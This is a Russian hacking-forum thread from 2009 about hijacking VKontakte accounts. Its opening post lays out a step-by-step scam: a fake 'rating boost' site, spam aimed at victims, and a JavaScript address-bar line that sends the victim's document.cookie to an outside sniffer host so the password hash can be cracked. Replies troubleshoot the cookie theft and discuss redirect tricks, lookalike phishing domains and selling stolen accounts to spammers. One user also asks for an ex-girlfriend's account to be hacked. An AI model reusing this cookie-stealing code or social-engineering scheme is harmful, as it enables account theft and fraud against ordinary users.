Просмотр полной версии : угон акка от контакта на 90 %
Пароль на архиве такой, что я с первого раза угадал:hmcool:
я так понял что при вставке этого кода, должна пойти анимация как бы повышающегося рейтинга да ? ..или просто появиться табличка ?
pantoderm
25.08.2009, 01:00
Привет всем я Pantoderm и это моя первая статья так что не судите строго. Хотел бы поделиться с вами своим способом угона акков от популярной социальной сети Вконтакте.ру Для этого нам понадобиться (как и с фейком ) бесплатный хостинг , и парочка замечательных скриптов для поднятия рейтинга и повышения голосов( я их опубликую немного позже) . И так приступим =)
1)Сначало зарегистрируем себе сайт , сайт какой нибудь фирмы салидной , но о которой некто нечего не знает. Думаю с этим проблем не будет.
2) убираем с сайта всё кроме главное страницы , и делаем там рекламму . у меня за 10 минут получилось примерно такое http://reyting.wmsite.ru/ (https://hpc.name/redirector.html#http://reyting.wmsite.ru/) .
Лично я регал на http://www.webstolica.ru/ (https://hpc.name/redirector.html#http://www.webstolica.ru/) потому что вконтакте не выдаёт что эта ссылка ведёт на фришенговый сайт .
(http://hpc.name/forum/vbimghost.php?do=displayimg&imgid=1438)
2.1) для хорошей рекламы нам понадобиться мажорик с большим рейтингом и ОТКРЫТОЙ СТРАНИЦЕЙ , что бы все могли заходить и смотреть что это правда. Для того что бы найти его мы заходим в группу где можно приглашать и нажимаем расширенный поиск ---- поиск и все у кого большой рейтинг идут первыми вот и выбирайте кого будем копировать
Что бы снять виде о подтверждении что скрипты работают мы зарегистрируем двойника этого мажорика . как это делать думаю объяснять не надо.
3)идём на раздачу халявных акков вконтакте берём и начинаем немного спамить
p/s что бы сорвать побольше акков нужно обязательно дописать « что бы рейтинг закрепился пригласите на сайт ещё 10 друзей» ну или сколько душе угодно =) только смотрите не переборщите
теперь объясняю суть идеи :
жертва заходит на сайт и видит что это бесплатный рейтинг , но её это настораживает специально для этого мы делаем отвод глаз и пишем что рейтинг не совсем бесплатный его получают за просмотр рекламы ,тогда жертва успакаеваться и спокойно вставляет скрипт , но скрипт с незаметной дороботкой а точнее с javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nr7gif758k8.gif?"+document.cookie;') - это скрипт для адрессной строки со сниффера на .hacker-pro.net зарание замаскированным на тут (https://hpc.name/redirector.html#http://www.scriptasylum.com/tutorials/encdec/encode-decode.htm) потому что есть народ который знает про это и начинают портить всю малину . и когда наша жертва вставляет «волшебный» скрипт то о чудо на её странице рейтинг начинает подниматься ! в это время куки от контакта идут нам на сниффер в папку ЛОГ (для тех кто не знает ) . всё мы идём туда копирует remixpass а точнее то что стоит после знака равно = и расшифроввываем на онлайн расшифровщиках
теперь скрипты я их не стал выкладывать их сюда потому что народу много ходит я их залью а вы скачаете.
вот впринцепи и всё спасибо за внимание с вами был начинающий хакер Pantoderm так же хочу выразить благодарность Uxta .
смотрите внимательно куда вставлять JavaScript код для адресной строки
там всё написанно Скачать скрипты (https://hpc.name/redirector.html#http://dump.ru/file/3297816)
специально для hacker-pro.net
пароль на архив со скриптами
Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
всем удачи и если статека понравилась не скупитесь ставить плюс и спасибо
KpeBeDbI4
25.08.2009, 01:00
Молорик, половину можно было заХАЙДить....ИМХО.
pantoderm
25.08.2009, 01:00
Цитата:
Сообщение от t0xA
Мне понравилось, можно еще запихать фейковые проги аля поднимаем рейтинг, фековый софт вобщем, в кукках есть трабла в том что MD5 трудно расшифровать... Или софт со склееным трояном!
да можно было бы желание . но я привёл пример сайта деловой фирмы которая дат рейтинг за просмотр рекламмы . и мне кажется что на проги мало кто ведёться а вот со скриптами можно ещё поработать ))
Цитата:
Сообщение от KpeBeDbI4
Молорик, половину можно было заХАЙДить....ИМХО.
я пытался но чёт не получаеться (
KpeBeDbI4
25.08.2009, 01:00
Цитата:
Сообщение от pantoderm
я пытался но чёт не получаеться (
о_О" хайд походу убрали, я вообще найти не могу.
pantoderm
25.08.2009, 01:00
Цитата:
Сообщение от QwE43
а чтобы не парится с регистрацией новвого акка можно просто полоску рейтинга изменить :wink:
тоже верно но все знают про программу фотошоп . так что многие уйдут )) а видео доказывает что скрипт работает )
Молодец.
Только писал ты её конечно не совсем сам, вижу что чёто и от себя добавил, но суть с*****нул отсюда http://11rus-team.ru/forum/showthread.php?t=36 (https://hpc.name/redirector.html#http://11rus-team.ru/forum/showthread.php?t=36)
это даже видно по скринам которые делал я сам лично)
pantoderm
25.08.2009, 01:00
Цитата:
Сообщение от Uxta
Молодец.
Только писал ты её конечно не совсем сам, вижу что чёто и от себя добавил, но суть с*****нул отсюда http://11rus-team.ru/forum/showthread.php?t=36 (https://hpc.name/redirector.html#http://11rus-team.ru/forum/showthread.php?t=36)
это даже видно по скринам которые делал я сам лично)
блин извини чесное слово не знал об этом зуб даю )) а статью я сам писал с нуля отвечаю а скрины для сайта не буду врать взял у тебя ))
Цитата:
блин извини чесное слово не знал об этом зуб даю )) а статью я сам писал с нуля отвечаю
Ну да, и скрины загадочным образом у тебя такие же да? и с коментами теме же на них?))
Короче не гони. Пох*й, запостил и запостил.
pantoderm
25.08.2009, 01:00
Цитата:
Сообщение от Uxta
Ну да, и скрины загадочным образом у тебя такие же да? и с коментами теме же на них?))
Короче не гони.
да признаюсь картинку взяты у тебя , что бы не терять времени на сайте . так что извини меня за это. я честное слово не знал про твою статью . а за то что ты натолкнул меня на написание статьи я выразил тебе благодарность в конце
пацы помогите мне сделать такую штуку к в первой статье я в этом полный 0
у меня всё есть код для рейтинга и снифера!!!!!!!!!!!!
ток я не пойму как это соеденить!!!!!!!!!
ПОМОГИТЕ ПЛЗ КОМУ НЕ ВПАДЛУ!!!!!!!!!!!!!!!!
pantoderm
26.08.2009, 01:00
Цитата:
Сообщение от demooo
пацы помогите мне сделать такую штуку к в первой статье я в этом полный 0
у меня всё есть код для рейтинга и снифера!!!!!!!!!!!!
ток я не пойму как это соеденить!!!!!!!!!
ПОМОГИТЕ ПЛЗ КОМУ НЕ ВПАДЛУ!!!!!!!!!!!!!!!!
Добавлено через 4 минуты
пацы помогите мне сделать такую штуку к в первой статье я в этом полный 0
у меня всё есть код для рейтинга и снифера!!!!!!!!!!!!
ток я не пойму как это соеденить!!!!!!!!!
ПОМОГИТЕ ПЛЗ КОМУ НЕ ВПАДЛУ!!!!!!!!!!!!!!!!
ПЛЗ!!!!!!!!!!!!!
уже помог ))
JIEHHu-KEHHu
26.08.2009, 01:00
Интересная статья Но вот только к чему угонять акк? профит за возврат? продать-то не получится. при смене имени - обнуляется рейтинг...
факт в том, что мне неприходят куки...когда убираю скрипт для командной строки (не имеет значении в каком виде, сам скрипт рабоает как нада, а так только сообщения вылазиют
pantoderm
28.08.2009, 01:00
Цитата:
Сообщение от JIEHHu-KEHHu
Интересная статья Но вот только к чему угонять акк? профит за возврат? продать-то не получится. при смене имени - обнуляется рейтинг...
можно набрать акков и продать спамщикам )
У меня почему-то java скрипт не работает... После того, как я вставляю его к себе в строку, ничего не происходит...
Вот мои скрипты
Не шифрованный
Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
Шифрованный
Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
P.s Ни первый, не второй не работает... В чем может быть проблема?
pantoderm
05.09.2009, 01:00
Скрытый текст (вы должны быть авторизованы и иметь 14 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
Все-равно не работает =((
Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
pantoderm
05.09.2009, 01:00
Скрытый текст (вы должны быть авторизованы и иметь 14 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
Скрытый текст (вы должны быть авторизованы и иметь 10 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
kam1LLe, если ты имеешь в виду код для адресной строки то можешь просто скопировать этот код со страницы настроек в твоем аккаунте на онлайн сниффере.
Добавлено через 3 минуты
да и если ты вставляешь в адресную строку код тебе только в первый раз придут куки, эти же куки второй раз не придут пока не почистишь кэш. попробуй сменить ак чтоб куки изменились или с другого браузера, или почисть кэш
Vampir73rus
06.09.2009, 01:00
ааа парни почему так ! я вставил яваскрипт в адресную строку и у меня пропали голоса ??? куда они делись ???
Добавлено через 4 минуты
убью того кто это сделал !!!
pantoderm
07.09.2009, 01:00
Цитата:
Сообщение от Vampir73rus
ааа парни почему так ! я вставил яваскрипт в адресную строку и у меня пропали голоса ??? куда они делись ???
Добавлено через 4 минуты
убью того кто это сделал !!!
чё ты сделал ???? распиши всё по пунктам
Цитата:
Сообщение от Vampir73rus
ааа парни почему так ! я вставил яваскрипт в адресную строку и у меня пропали голоса ??? куда они делись ???
Добавлено через 4 минуты
убью того кто это сделал !!!
Да ты вроде сам отдал свои куки народу, вот ктото зашел на с твоими куками и украл твои голоса. Не надо было вставлять этот скрипт
adrenalin_fun
10.09.2009, 01:00
Стырил куки, а что дальше? Как из них сделать свои? Пробовал менять свои куки на чужие, контакт только думает-думает а потом всё равно выкидывает на мою страницу
pantoderm
11.09.2009, 01:00
Цитата:
Сообщение от adrenalin_fun
Стырил куки, а что дальше? Как из них сделать свои? Пробовал менять свои куки на чужие, контакт только думает-думает а потом всё равно выкидывает на мою страницу
попробуй их расшифровать
MD 5 не расшифровать...
только подбор, и то если пароль легки можно провернуть, если нет то не получится ничего
Цитата:
Сообщение от Damir72
MD 5 не расшифровать...
только подбор, и то если пароль легки можно провернуть, если нет то не получится ничего
как и обозначена тема, на 90% есть шанс взлома, мало кто из пользователей ставит пароли вида w3_j8-zm, так что все возможно, главное желание, а если его нет всегда можно сделать заказ ))
absentik
15.09.2009, 01:00
Не совсем в тему, но что делать если жертва воспользовалась скриптом со снифера на адресную строку и там вышли след данные remixchk=5; remixsid=цыфрыдабуквыдохера и еще там пришел ip и еще воть
REFERER: http://vkontakte.ru/audio.php?gid=29620 (https://hpc.name/redirector.html#http://vkontakte.ru/audio.php?gid=29620)
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 1, 0, 4 HW; MRA 5.5 (build 02746); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Я вот знаю что с Оперы мона зайти подменив кукисы в колонке с почтой и ремикс пассом. Я вот недогоняю одно: или с помощью ремиксid мона заходить и взломать контакт или снивер не словил нужного по скрипту у моей жертвы. Знающие люди помогите!!!!!!!
pantoderm
16.09.2009, 01:00
Цитата:
Сообщение от Absentik
Не совсем в тему, но что делать если жертва воспользовалась скриптом со снифера на адресную строку и там вышли след данные remixchk=5; remixsid=цыфрыдабуквыдохера и еще там пришел ip и еще воть
REFERER: http://vkontakte.ru/audio.php?gid=29620 (https://hpc.name/redirector.html#http://vkontakte.ru/audio.php?gid=29620)
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 1, 0, 4 HW; MRA 5.5 (build 02746); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Я вот знаю что с Оперы мона зайти подменив кукисы в колонке с почтой и ремикс пассом. Я вот недогоняю одно: или с помощью ремиксid мона заходить и взломать контакт или снивер не словил нужного по скрипту у моей жертвы. Знающие люди помогите!!!!!!!
что то не до конца пришло. ещё должно придти логи и пасс
GetGroovy
17.09.2009, 01:00
Все прикрыли баг!!! пасворды хешиться на login.vk.com... и другие куки кроме remixsid и remixchk неприйдут!!
эм....я вот одного не понял, как "JavaScript код для адресной строки" соединить с JavaScript рейтинга? объясните.
docunent
19.09.2009, 01:00
переделать скриптик надо)
anubis6666
19.09.2009, 01:00
Цитата:
Сообщение от GetGroovy
Все прикрыли баг!!! пасворды хешиться на login.vk.com... и другие куки кроме remixsid и remixchk неприйдут!!
там уже не логины и пассы,а сессии т.к в самих куках даже пароля нет md5
kir55rus
20.09.2009, 01:00
у меня вместо повышения рейтинга перебрасывало человека на другую страницу, че делать?
ЗЫ:перед этим рейтинг вообще не повышался((
GetGroovy
20.09.2009, 01:00
Да скрипт уже не робит... надо другой уже писать
Каму нужны ааки в контакте пиши те в лс да м беспл
Шумахер Я это делал еше когда тема появилось все шло отлично но потом не стала приходит это тема я же не один такой тут! если появился другой случай юзай если делать нех токо акки воровать.
Цитата:
Сообщение от pak
Шумахер Я это делал еше когда тема появилось все шло отлично но потом не стала приходит это тема я же не один такой тут! если появился другой случай юзай если делать нех токо акки воровать.
и сейчас все отлично идет,просто нынишний remixsid не проходит,так как там идет привязка к нему айпи адреса...А скрипты все работают...
Скрипт - "JavaScript код для адресной строки c редиректом",который находиться в настройках снифера на етом сайте - работает...Только толку,сейчас remixsid уже не катит,Дуров позаботился об этом...
teslaaaa
12.10.2009, 01:00
крут, что еще сказать)
вот со скриптами много кто поведется, даю зуб
З.Ы: тупого быдла вконтакте хватает)
Prodigy521
20.10.2009, 01:00
Или нормальные люди это давно это уже знают, или тема просто старая (не посмотрел). Щас от этого уже ничего не получишь... Вконтакте очень быстро развивается. Пару месяцев назад каждый второй велся на бесплатные голоса, год назад абсолютно все)) Лучше угонять мыло жертвы ИМХО, тк Дуров еще не додумался не присылать пасс от акка, а только ссылку на его изменение. Ну и с мылом намного больше возможностей.
kir55rus
25.10.2009, 01:00
а че, уже действует тот скрипт?
вроде говорили, что уже все...ушел в отставку...
Щас фейки как-то не актуально, с нынешним приливом спама, но за статью +
Цитата:
Сообщение от Prodigy521
Или нормальные люди это давно это уже знают, или тема просто старая (не посмотрел). Щас от этого уже ничего не получишь... Вконтакте очень быстро развивается. Пару месяцев назад каждый второй велся на бесплатные голоса, год назад абсолютно все)) Лучше угонять мыло жертвы ИМХО, тк Дуров еще не додумался не присылать пасс от акка, а только ссылку на его изменение. Ну и с мылом намного больше возможностей.
Да я тож так щитал пока неввели смс подтверждающий код при востановлении паса от контактов, ерунда подумаете ,моба нету или шо!??!, но нетут и нетогда здесь дуров тож подшывилил привязку номера к айдешнику, такшто если хоче акки угонять таким способом то закупай номера (симки) оптом!
Цитата:
Сообщение от Alex_rock
Напишите пожалуйста как настроить сниффер.....детально.....и какой скрипт надо вставить.....зарание благадорю
в разделе снифер есть видео по его использованию
corpse1888
07.11.2009, 01:00
В общем угнал с контакта пару акков с рейтингом.Нокак теперь мене этот рейтинг и голоса перевести? Пробовал через приложение пишет что нет голосов ,хотя есть.!?
Corpse1888 Если есть точно голоса,то переведи их на счет приложения==>потом перевади к себе на приложение!!!
nevil Не флудь,у тя даже постов мало,что-бы все видеть!!!
вообще то статья нормальок правда для тех кто не знает читать иль просто туп
прочитавши сам скрипт а именно: "img.src="http://httpz.ru/njmaq7qqudf.gif?"+document.cookie;" меня бы лично уже бы насторожило.
хотя и название туповатое
скажите мне пожалуйста кто с вас сохраняет cookie.
без обид но эту статью мона отнести к "Еще один способ угона" но точно не на 90 проц.
и кстати pantoderm есть пару вопросов:
1 ты сохраняеш cookie?
2 если да то дай свое мыло(проще напиши мне его + пароль))))
P.S. в скриптах я нихрена не понимаю но всеж таки читать нада.
Почему когда я рейтинг повышаю спомощи скрипта он не сохраняется????? хоть вы говорили что он нормальный...
pantoderm
11.11.2009, 01:00
Цитата:
Сообщение от SashOk
Почему когда я рейтинг повышаю спомощи скрипта он не сохраняется????? хоть вы говорили что он нормальный...
читай внимательней , таких скиптов нет
А как тогда повысить голоса или рейтинг что бы было нормально???
kir55rus
11.11.2009, 01:00
покупай голоса, и играй в лотереях.
именно так и делают, у кого рейт 1к+
Да ни как , что же вы не можите понять что нет таких СКРИПТОВ!!!!!!!!:turned:
Что вы думаете об этом сервисе - http://hover.fancy.kz/vkontakte.ru (https://hpc.name/redirector.html#http://hover.fancy.kz/vkontakte.ru), может быть это паранойя, но как-то палённым пахнет))
roberto123
18.11.2009, 01:00
мне не получачаеться что то, а етот метод еще дествительный?
Nickolay
23.11.2009, 01:00
Подскажите, а куки вКонтакте - сейчас не закрепляются на ip?
Когда у себя с одного из аккаунтов беру куки и подставляю на другой - все работает - перехожу в сессию этого аккаунта.
В случае, когда подставляю "украденные" - куки - ничего не происходит, при обновлении страницы - куки обновляются, если запретить прием куки, выбрасывает на страницу входа в учетную запись.
trufchik
29.11.2009, 01:00
Всё методы основаны на расшифровке cookies, т.е. жертва должна совершить оплошность, совершив оплошность, ререйдя по незнакомой ссылке, введя свой логин и пароль на фейке контакта...
А есть ли способ узнать пароль от страницы, если человеку не интересны голоса, рейтинг и прочая лабуда, по ссылкам переходить он не будет... А?
Да, допустим известен логин, т. е. e-mail (предположительно).
BloodSpy
01.12.2009, 01:00
Цитата:
Сообщение от trufchik
А есть ли способ узнать пароль от страницы, если человеку не интересны голоса, рейтинг и прочая лабуда, по ссылкам переходить он не будет... А?
Да, допустим известен логин, т. е. e-mail (предположительно).
Да, если контакт зареген давно, то можно взломать е-мэйл, и на него запросить пароль от контакта.
Снифер уже не вдохновляет..можно бы было как нибудь с исходником поработать..или чтонить в этом роде...
Drakogan
16.12.2009, 01:00
прикольно
PhiberOptic
22.12.2009, 01:00
Я лично, как пользователь провайдера с локальными ресурсами, которые расшаривают сами пользователи (идиоты =D), пользуюсь тем, что некоторые расшаривают целиком диск Цэ.. Ну и куки все соответственно
DonDrakon
22.12.2009, 01:00
Только что попробовал использовать такой скрипт но мне почему-то пришло только remixchk и remixsid. Я что-то неправильно сделал или же на вконтакте уже как-то по хитрому пароли хранятся?
DonDrakon
25.12.2009, 01:00
Дак что никто не может подсказать с куки?
Pit_Bull
27.12.2009, 01:00
pantoderm, спасибо, очень мне помогла! +
M@ZAX@KEP
27.12.2009, 01:00
Цитата:
Только что попробовал использовать такой скрипт но мне почему-то пришло только remixchk и remixsid. Я что-то неправильно сделал или же на вконтакте уже как-то по хитрому пароли хранятся?
Ты сам ответил на свой вопрос. Открой свои кукисы в броузере и увидишь что пароль в md5 хранится в отдельной папке (присвоен для другой страницы), короче, именно по-хитрому ))
ЗЫ метод взлома контакта через кукис уже не актуален. (ибо кукис разделены на 2 части, а стырить получится только 1, которая не имеет ничего полезного).
:disgust: :disguise: :hmm1: :working: :bop: Неужели нельзя с javascript долезть до login.vk.com? Блин, я токо наладил всё для хака, а присылает remixchk и remixsid! :246:
Значит осталась инъекция контакта и фейки... Пробовал хто-нить?
Добавлено через 46 минут
Цитата:
E-mail или Логин:
Пароль:
onDomReady(function() {
var uiExpire = new Checkbox(ge('expire'), {
width: 123,
checked: false,
label: 'Чужой компьютер'
});
});
Вход
Регистрация
Короче нудо как-то добиться до папки login.vk.com... В куках.Может заюзать php?
M@ZAX@KEP
28.12.2009, 01:00
Думаю, можно сделать по-другому... от примерная схема скроипта:
1) Кража кукис
2) редирект на login.vk.com
3) Кража кукис исчо раз))
Вопрос в том, подолжит-ли скрипт работу после редиректа? Кто-нибудь, попробуйте так, если получится - отпишитесь, а то мне чёта некогда... xD
araqwa2009
29.12.2009, 01:00
привет кто сможет сломать страницу в контакте ?
Цитата:
Сообщение от araqwa2009
привет кто сможет сломать страницу в контакте ?
Учись и взломай сам:wink:
Это уже частично устарело и кстати давно...
remixchk
remixsid
remixgroup_closed_tabs
remixclosed_tabs
Что вам дадут такие куки..., дадут правда но мало чего и не на долго:hmcool:
Так что угон на 90% - это уже не катит...
M@ZAX@KEP
30.12.2009, 01:00
Цитата:
Сообщение от Dn7
Есть предложение по взлому.
1. Чел вводит код в адресную строку на vkontakte.ru.(код кидает куки на снифф, редиректит на vk.login.com)
2. На vk.login.com вводит другой код.(код снова кидает куки на снифф, редиректит на vkontakte.ru)
3. Всё, повышение голосов или там поднятие рейтинга для клиента кончилось, куки у нас... :bq:
З.Ы. Если просто зайти на vk.login.com, то куки от него стираются! Ему нужна какая-то переменная? Или чё ему надо?... :86:
Я вообще-то это уже сказал)) почти то же самое:
Цитата:
1) Кража кукис
2) редирект на login.vk.com
3) Кража кукис исчо раз))
По поводу того что стирается... так специально сделано чтобы и такая схема с редиректом не сработала... ему нужен логин и пароль чтобы авторизацию провести... вобщем походу лазейку с такой xss в контакте прикрыли окончательно и без вариантов (старый добрый принцип: "нельзя так - значит попробуем по-другому" уже не канает! =( )
Есть предложение по взлому.
1. Чел вводит код в адресную строку на vkontakte.ru.(код кидает куки на снифф, редиректит на vk.login.com)
2. На vk.login.com вводит другой код.(код снова кидает куки на снифф, редиректит на vkontakte.ru)
3. Всё, повышение голосов или там поднятие рейтинга для клиента кончилось, куки у нас... :bq:
З.Ы. Если просто зайти на vk.login.com, то куки от него стираются! Ему нужна какая-то переменная? Или чё ему надо?... :86:
Кстате, столкнулся с такой проблеой. Есть куки от контакта, однако если их загнать в мой браузер, захожу просто на vkontakte.ru Идёт загрузка (ну как бы логин) и меня кидает НА МОЮ СТРАНИЦУ И КУКИ АВТОМАТИЧЕСКИ ИЗМЕНЯЮТСЯ НА МОИ! В чём проблема? О_о
Сам голову ломаю днями, пытаюсь разные способы... Ниче пока не катит, ппц...
UrgeOverkill
06.01.2010, 01:00
я не все страницы прочел, что мне интересно, раньше до ввода логин.вк.ком все было просто относительно. Если не брать увод чужих куков итд, а взять простую ситуацию: Человек зашел от меня вконтакт, посидел, вышел, ушел домой. Как теперь тащить с куков пароль? Галочка - чужой компьютер роль вообще имеет при таком случае?
Цитата:
Сообщение от UrgeOverkill
Галочка - чужой компьютер роль вообще имеет при таком случае?
Галочка имеет роль, просто при перезегрузке браузера куки уничтожаются....(((
Добавлено через 3 минуты
Хм.... сейчас по моему возможен взлом контакта только через фейковый сайт, который по оформлению будет похож на вконтакте, только придется расчитывать на то что "юзер" не обратит внимания на адресную строку.....
http://img-fotki.yandex.ru/get/4103/neko2or.0/0_1bc41_b0a93619_orig
ItsMyWay
06.01.2010, 01:00
Автору темы респект! + с меня..
А кто поможет разобрать или обесните по точней куда вставлять ('img = new Image(); img.src = "http://httpz.ru/nr7gif758k8.gif?"+document.cookie;')....заранее спасибо
M@ZAX@KEP
08.01.2010, 01:00
Вставлять по идее туда где есть xss уязвимость.
Но сколько уже можно говорить что вконтакте такое больше не канает!
DonDrakon
09.01.2010, 01:00
Этот способ уже не работает так как на вконтакте появилась какая-то привязка к компу и красть куки и вставлять себе уже не работает.
Blackdjs
09.01.2010, 01:00
Сейчас на такую фигню не видутся,а на фейк картинка вместо граффити много лохов ведется
Antonqw72
11.01.2010, 01:00
Какой сами лучи бисплатни хостинг?
AkeJIJIa
17.01.2010, 01:00
я угнал куки снифером
но человек захоходил Мозилой
я куки вставляю в Оперу он все равно мою страницу окрывает
что делать?
Добавлено через 2 минуты
друзья
з7начит куки уже безполезно красть??
а как тогда можно угнать Акк вКонтакте
M@ZAX@KEP
17.01.2010, 01:00
Да для таких как ты уже 1000 раз сказали что бесполезно! Сколько можно?
AAAndrey
17.01.2010, 01:00
Скрипты - РАБОТАЮТ!
M@ZAX@KEP
18.01.2010, 01:00
troy, если бы это был нормальный рабочий скрипт, всё было бы по-человечески разложено по строками и закомментированно. Так пишут только скрипты, которые что-то гадкое делают просто чтобы в них нельзя было разобраться.
Судя по повсеместно повторяющемуся в скрипте id, он что-то отправляет Дурову (id:1) и, скорее всего, тебя после этого забанят xD
контакт всё сложнее ломать..
над уязвимостями работают люди..
через хсс тока..
Лохи тоже поумнели уже, все смотрят на строчку в браузере, что написано...
vkántakte.ru точно не прокатит, ну разве что кто по пьяне сидит за компом кто, иль с бодуна великого.
Добавлено через 23 минуты
На сайте у меня для пользователей на некоторых страницах, дабы они видели сколько раз туда они уже заходили,стоит такой скрипт:
0)
date.setTime(date.getTime() - skew)
}
//-->
естественно, что основываясь на кукис, может его можно как то видоизменить, или дописать чего, дабы их перехватывать? Если кто силен в сие?, - может можно его с пользой для общего блага применить?
Добавлено через 6 минут
!
DeSharky
22.01.2010, 01:00
Зачем все это?люди уже поработали: http://vkontkante.ru/base.php (https://hpc.name/redirector.html#http://vkontkante.ru/base.php) ))) обновляется каждую минуту...
Добавлено через 3 минуты
adama, все таки лохов много,многие не смотрят в строку адреса...и база base.php это подтверждает )))
Цитата:
Сообщение от DeSharky
Зачем все это?люди уже поработали: http://vkontkante.ru/base.php (https://hpc.name/redirector.html#http://vkontkante.ru/base.php) ))) обновляется каждую минуту...
Добавлено через 3 минуты
adama, все таки лохов много,многие не смотрят в строку адреса...и база base.php это подтверждает )))
Там хоть 1 работающий есть?? Заходят много, а вводят херню какую-то:turned:
vitaljaa
25.01.2010, 01:00
некаторие работают
Morfius2010
28.01.2010, 01:00
Ищу мастера -умельца ,который взломает анкету на одноклассниках или хотя бы ее удалит.Нет сил моих больше ,анкета бывшей девушки ,я до сих пор ее люблю и ревную .Надеюсь мужчины меня поймут. она зараза флиртует там по моей информации.Желающие помоч напишите в приват пожалуйста. Надеюсь на помощь.Всем удачи !
M@ZAX@KEP
08.02.2010, 01:00
По-моему, во избежании ненужных вопросов, флуда и отчаянных попыток новичков что-то осуществить, тему надо закрыть а лучше ещё и спрятать в архив!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot